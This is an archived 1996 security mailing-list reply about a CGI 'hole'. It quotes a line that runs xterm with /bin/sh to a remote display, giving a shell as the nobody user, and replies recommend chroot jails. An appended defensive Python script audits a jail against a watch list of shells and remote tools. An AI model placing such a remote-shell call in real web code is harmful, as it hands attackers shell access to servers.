[3686] in WWW Security List Archive

Re: Hole: nobody shell

daemon@ATHENA.MIT.EDU (Steve Neruda)
Wed Dec 4 11:20:58 1996

Date: Wed, 04 Dec 1996 09:20:15 -0500
From: Steve Neruda <nerudas@nationwide.com>
To: Brian Harvell <harvell@inet.net>
CC: Andrea Di Fabio <fabio@cs.odu.edu>, www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu

Brian Harvell wrote:
> 
> >
> > I was experimenting with cgi scripts when I came up with this idea:
> >
> > What if I have a cgi script which does the following:
> > system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
> >
> > I can now pop an xterm on my display as nobody.
> > This way any user can gain access to the nobody account and
> > have fun with it...
> >
> > Has this been discussed anywhere?
> > Is there a fix out there?
> >
> Yeah don't do it. You can do things a lot worse if you wanted.

I really wish that more of the http servers ran in a true change root
environment (rather than limiting access by config like most servers
do).  This would prevent people from getting to things like xterm
(though I suppose having Perl in your change rooted area still leaves
a lot of tools to play with).

SteveN
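
An added example, not part of the original message: a defender's audit of a web server's chroot area that reports the kind of tools the reply warns about (shells, interpreters such as Perl, xterm) and CGI scripts that force an interpreter to be present. The watch list, function names and sample tree are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Assumed watch list: the post names only xterm, sh and Perl; extend as needed.
RISKY = {"sh", "csh", "ksh", "bash", "perl", "python", "tclsh", "xterm", "telnet", "rsh"}

def base_tool(name):
    """Map 'perl5.003' to 'perl' so versioned binaries still match."""
    return re.split(r"[^a-z]", name, maxsplit=1)[0] or name

def shebang_tool(path):
    """Return the interpreter named on a script's #! line, or '' if none."""
    with open(path, "rb") as fh:
        first = fh.readline(256)
    words = first[2:].split() if first.startswith(b"#!") else []
    return base_tool(os.path.basename(words[0].decode("latin-1"))) if words else ""

def audit_jail(root):
    """Return sorted (relative path, reason) pairs for tools found under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if not stat.S_ISREG(mode) or not mode & 0o111:
                continue  # only executable regular files; symlinks are skipped
            rel = os.path.relpath(full, root)
            if base_tool(name) in RISKY:
                findings.append((rel, "executable shell, interpreter or remote tool"))
            elif (tool := shebang_tool(full)) in RISKY:
                findings.append((rel, "script needs %s inside the jail" % tool))
    return sorted(findings)

def build_sample_jail():
    """Constructed sample tree standing in for a web server's chroot area."""
    root = tempfile.mkdtemp(prefix="jail-")
    layout = {"bin/perl5.003": b"\x7fELF", "cgi-bin/form.cgi": b"#!/bin/perl\nprint 1;\n",
              "cgi-bin/count": b"\x7fELF", "htdocs/index.html": b"<html></html>"}
    for rel, data in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, 0o644 if rel.endswith(".html") else 0o755)
    return root

if __name__ == "__main__":
    print(audit_jail(build_sample_jail()))
```

Scripts that start through `#!/usr/bin/env` are not resolved to their interpreter here, and an empty report only means none of the listed names were found under the jail root.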